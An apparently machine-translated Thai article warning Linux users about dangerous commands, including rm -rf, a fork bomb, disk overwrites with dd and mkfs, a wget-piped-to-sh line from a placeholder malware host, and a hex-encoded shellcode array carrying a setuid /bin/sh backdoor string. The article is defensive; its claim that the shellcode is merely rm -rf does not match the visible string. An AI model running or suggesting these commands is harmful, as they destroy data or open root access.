ถ้าคุณเคยใช้ระบบปฏิบัติการ Linux คุณอาจรู้ว่าแพลตฟอร์มนี้เป็นอิสระมากกว่า Windows ลินุกซ์เป็น ระบบปฏิบัติการโอเพ่นซอร์ส และให้อิสระแก่ผู้ใช้ในการดำเนินการต่างๆ อย่างเพียงพอ อย่างไรก็ตาม สำหรับผู้ใช้ครั้งแรก การใช้งาน Linux อาจเป็นงานที่ท้าทาย
เช่นเดียวกับบน Windows Linux ยังมีคำสั่งเทอร์มินัลจำนวนมากเพื่อดำเนินการต่างๆ อย่างไรก็ตาม ต่างจาก Windows ตรงที่ Linux จะไม่ขอให้คุณยืนยันหากคุณเรียกใช้คำสั่งใดๆ ที่อาจสร้างความเสียหายให้กับระบบของคุณ ดังนั้น เราขอแนะนำให้คุณอย่าใช้คำสั่งเหล่านี้ไม่ว่ากรณีใดๆ
ดังนั้น ในบทความนี้ เราจะแบ่งปันคำสั่ง Linux ที่เป็นอันตรายซึ่งคุณไม่ควรเรียกใช้บน Linux ลองตรวจสอบคำสั่งร้ายแรงที่คุณไม่ควรเรียกใช้บนคอมพิวเตอร์ Linux
rm -rf
คำสั่ง rm -rf เป็นหนึ่งในวิธีที่เร็วที่สุดในการลบโฟลเดอร์และเนื้อหา แต่การพิมพ์ผิดเล็กน้อยหรือความไม่รู้อาจส่งผลให้ระบบเสียหายอย่างไม่สามารถกู้คืนได้ ตัวเลือกบางตัวที่ใช้กับคำสั่ง rm เหมือนกับคำสั่ง Rm -r ลบโฟลเดอร์ซ้ำๆ แม้กระทั่งโฟลเดอร์ว่าง rm -f Command ลบ "อ่านเฉพาะไฟล์ 'โดยไม่ต้องถาม นอกจากนี้ยังมีพลังในการกำจัดไฟล์ทั้งหมดที่มีอยู่ในไดเร็กทอรีราก
: () {: |: &} ;:
คำสั่งข้างต้นคือระเบิดส้อม มันทำงานโดยกำหนดฟังก์ชันที่เรียกว่า ” ซึ่งเรียกว่าสองครั้ง หนึ่งครั้งในเบื้องหน้าและอีกครั้งในพื้นหลัง มันยังคงทำงานซ้ำแล้วซ้ำอีกจนกว่าระบบจะหยุดทำงาน
command> / dev / sda
คำสั่งดังกล่าวเขียนผลลัพธ์ของ 'คำสั่งบนบล็อก / dev / sda คำสั่งด้านบนเขียนข้อมูลดิบและไฟล์ทั้งหมดในบล็อกจะถูกแทนที่ด้วยข้อมูลดิบ ส่งผลให้ข้อมูลในบล็อกสูญหายทั้งหมด
mv ไดเร็กทอรี / dev / null
คำสั่งนี้โดยทั่วไปจะย้ายไฟล์ทั้งหมดไปที่ / dev / null ใช่ หมายความว่ามันหายไปจากไฟล์ทั้งหมดจากระบบ
wget http: // malware_source -O | sh
คำสั่งดังกล่าวจะดาวน์โหลดสคริปต์จากแหล่งที่เป็นอันตรายแล้วเรียกใช้งานบนระบบของคุณ คำสั่ง Wget จะดาวน์โหลดสคริปต์และคำสั่ง sh จะเรียกใช้สคริปต์ที่ดาวน์โหลดมาในระบบของคุณ
Mkfs.ext3 / dev / sda
คำสั่งดังกล่าวจะทำการฟอร์แมตบล็อค 'sda' และคุณจะทราบอย่างแน่นอนว่าหลังจากรันคำสั่งข้างต้น Block (ฮาร์ดดิสก์ไดรฟ์) ของคุณจะถูกรีเซ็ตเป็น NEW หากไม่มีข้อมูล จะทำให้ระบบอยู่ในระยะที่ไม่สามารถกู้คืนได้
> ไฟล์
คำสั่งดังกล่าวใช้เพื่อเผยแพร่เนื้อหาไฟล์ หากคำสั่งข้างต้นถูกดำเนินการโดยมีข้อผิดพลาดในการพิมพ์หรือความไม่รู้เป็น “> xt.conf” จะเขียนไฟล์การกำหนดค่าหรือระบบหรือไฟล์การกำหนดค่าอื่น ๆ
^ ฟู ^ บาร์
คำสั่งนี้ใช้เพื่อแก้ไขคำสั่งก่อนหน้าโดยไม่จำเป็นต้องพิมพ์คำสั่งใหม่ทั้งหมดอีกครั้ง แต่อาจเป็นปัญหาได้หากคุณไม่เสี่ยงตรวจสอบการเปลี่ยนแปลงในคำสั่งเดิมอย่างละเอียดโดยใช้คำสั่ง ^ ^ foo bar
dd if = / dev / สุ่มของ = / dev / sda
คำสั่งดังกล่าวจะลงท้ายด้วย / dev / sda และเขียนข้อมูลสุ่มสำหรับบล็อก แน่นอน! ระบบของคุณจะถูกปล่อยทิ้งไว้ในเฟสที่ไม่สอดคล้องกันและไม่สามารถกู้คืนได้
คำสั่งที่มองไม่เห็น
คำสั่งต่อไปนี้ไม่มีอะไรมากไปกว่าคำสั่งแรกของบทความนี้ ( rm-rf ) ที่นี่รหัสถูกซ่อนไว้ในฐานสิบหกเพื่อให้ผู้ใช้ที่ไม่รู้สามารถหลอกได้ รันโค้ดด้านล่างในเทอร์มินัลของคุณและล้างพาร์ติชั่นรูทของคุณ
คำสั่งนี้แสดงว่าภัยคุกคามสามารถซ่อนและมักจะตรวจไม่พบในบางครั้ง คุณควรรู้ว่าคุณกำลังทำอะไรอยู่และผลจะเป็นอย่างไร ไม่คอมไพล์ / รันโค้ดจากแหล่งที่ไม่รู้จัก
ถ่าน esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\ xf7″ “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\ x31" “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″ “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin /sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;
ดังนั้นนี่คือคำสั่ง Linux ที่เป็นอันตรายบางส่วนที่คุณควรหลีกเลี่ยง คุณไม่ควรเรียกใช้คำสั่งนี้โดยเสียค่าใช้จ่ายใดๆ ฉันหวังว่าบทความนี้จะช่วยคุณได้! แบ่งปันกับเพื่อนของคุณด้วย